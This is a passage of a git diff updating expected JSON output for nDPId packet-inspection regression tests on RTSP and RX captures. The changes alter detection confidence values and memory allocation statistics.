{"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","packets-captured":568,"packets-processed":568,"total-skipped-flows":0,"total-l4-payload-len":67396,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1627567528308} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 568/568 @@ -51,9 +51,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5907279 bytes -~~ total memory freed........: 5907279 bytes -~~ total allocations/frees...: 118736/118736 +~~ total memory allocated....: 6040913 bytes +~~ total memory freed........: 6040913 bytes +~~ total allocations/frees...: 121498/121498 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 804 chars 
diff --git a/test/results/rtsp_setup_http.pcapng.out b/test/results/rtsp_setup_http.pcapng.out index 82cdb7141..43f5c895c 100644 --- a/test/results/rtsp_setup_http.pcapng.out +++ b/test/results/rtsp_setup_http.pcapng.out 
@@ -2,8 +2,8 @@ 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625568705778} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1625568705778,"pkt":"AAwpI6CIeCSvPj0DCABFAADbwOlAAEAGFzesHAWqrBwEGvlgIWqjD4UUiv5WgFAYA\/\/+rgAAU0VUVVAgcnRzcDovLzE3Mi4yOC40LjI2Ojg1NTQvdHJhY2tJRD04OCBSVFNQLzEuMA0KQ1NlcTogNA0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpUcmFuc3BvcnQ6IFJUUC9BVlA7dW5pY2FzdDtjbGllbnRfcG9ydD01MDIyMC01MDIyMQ0KDQo="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1625568705778} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871572 bytes -~~ total memory freed........: 5871572 bytes -~~ total allocations/frees...: 118117/118117 +~~ total memory allocated....: 6005206 bytes +~~ total memory freed........: 6005206 bytes +~~ total allocations/frees...: 120879/120879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 473 chars ~~ json string max len.......: 818 chars diff --git a/test/results/rx.pcap.out b/test/results/rx.pcap.out index b9cd493ed..1c524a154 100644 --- a/test/results/rx.pcap.out +++ b/test/results/rx.pcap.out 
@@ -3,33 +3,33 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647264018,"flow_last_seen":1460647264018,"flow_idle_time":200000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1460647264018,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460647264018,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":334,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":334,"pkt_l4_len":300,"thread_ts_msec":1460647264018,"pkt":"PIqwbTfwAAjK968mCABFAAFA5\/AAAEARo32DctuowKfOfKJXG1oBLBrkVw+1YFw\/yYgAAAABAAAAAQAAAAEBBQAAAAAASQAAAfgAAAABAAAAZwAAAGkAAABvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460647264026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1460647264026,"pkt":"AAjK968mPIqwbTfwCABFAABAOykAADoRV0XAp858g3LbqBtaolcALPkKVw+1YFw\/yYgAAAABAAAAAQAAAAEBBAAAAAAASQAAAAEAACcR"} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1460647264026,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1460647264026,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460647264026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647264026,"pkt":"PIqwbTfwAAjK968mCABFAABd5\/IAAEARpF6DctuowKfOfKJXG1oASRKnVw+1YFw\/yYgAAAABAAAAAAAAAAICIQAAAAAASQAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647283326,"flow_last_seen":1460647283326,"flow_idle_time":200000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1460647283326,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1460647283326,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":334,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":334,"pkt_l4_len":300,"thread_ts_msec":1460647283326,"pkt":"PIqwbTfwAAjK968mCABFAAFA6DUAAEARoziDctuowKfOfJW7G1oBLLHjVw+1c1wtPyQAAAABAAAAAQAAAAEBBQAAAAAASQAAAfgAAAABAAAAZwAAAGkAAABvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1460647283340,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1460647283340,"pkt":"AAjK968mPIqwbTfwCABFAABATVwAADoRRRLAp858g3LbqBtalbsALJAKVw+1c1wtPyQAAAABAAAAAQAAAAEBBAAAAAAASQAAAAEAACcR"} 
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1460647283340,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1460647283340,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1460647283340,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647283340,"pkt":"PIqwbTfwAAjK968mCABFAABd6DcAAEARpBmDctuowKfOfJW7G1oASammVw+1c1wtPyQAAAABAAAAAAAAAAICIQAAAAAASQAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299605,"flow_last_seen":1460647299605,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1460647299605,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1460647299605,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1460647299605,"pkt":"PIqwbTfwAAjK968mCABFAABM9uIAAEARlX+DctuowKfOfBtZG1sAOL9z1w+zMFwiT6wAAAABAAAAAQAAAAEBBQAAAAAANAAAAg8AAAAJcm9vdC5jZWxsAAAA"} 
01894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1460647299669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1460647299669,"pkt":"AAjK968mPIqwbTfwCABFAARQURUAADoRPUnAp858g3LbqBtbG1kEPOsl1w+zMFwiT6wAAAABAAAAAQAAAAEBBAAAAAAANAAAAHIAAABvAAAAbwAAAHQAAAAuAAAAYwAAAGUAAABsAAAAbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwBuMngAAEMHAAAfwf\/\/\/6MAAAAlAAAAAQAAAAEAAAAAAAAAf\/\/\/\/6oAAAB3AIQN5gAA+50AABAS\/\/\/\/mP\/\/\/4QAAAABAAAAAQAAAAAAAAB\/\/\/\/\/qgAAAHcAbjJ4AABDBwAAH8H\/\/\/+jAAAAJQAAAAEAAAABAAAAAAAAAH\/\/\/\/+qAAAAdwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwAAAA8AAAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAEgAAABIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAyAAAAROcGeMAAAAAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299605,"flow_last_seen":1460647299669,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1124,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1460647299669,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299605,"flow_last_seen":1460647299669,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1124,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1460647299669,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1460647299669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647299669,"pkt":"PIqwbTfwAAjK968mCABFAABd9usAAEARlWWDctuowKfOfBtZG1sASZXi1w+zMFwiT6wAAAABAAAAAAAAAAICIQAAAAAANAAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299704,"flow_last_seen":1460647299704,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1460647299704,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1460647299704,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460647299704,"pkt":"PIqwbTfwAAjK968mCABFAAA8LUMAAEARXrqDctuowKfO8RtZG1gAKKMX1w+zMFwiT7AAAAABAAAAAQAAAAEBBQAAAAAAAQABAAQ="} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1460647299782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1460647299782,"pkt":"AAjK968mPIqwbTfwCABFAABeF80AADoReg7Ap87xg3LbqBtYG1kASo9g1w+zMFwiT7AAAAABAAAAAAAAAAECIgAAAAAAAQAAAAAAAAABAAAAAQAAAAAGAQEAAAAAAAWkAAAFpAAAABAAAAAB"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299704,"flow_last_seen":1460647299782,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1460647299782,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299704,"flow_last_seen":1460647299782,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1460647299782,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1460647299782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647299782,"pkt":"PIqwbTfwAAjK968mCABFAABdLVQAAEARXoiDctuowKfO8RtZG1gASaag1w+zMFwiT7AAAAABAAAAAAAAAAICIQAAAAAAAQAAAAAAAAABAAAAAAAAAAEHAAAAAAAAFjwAAAWkAAAAEAAAAAQ="} 
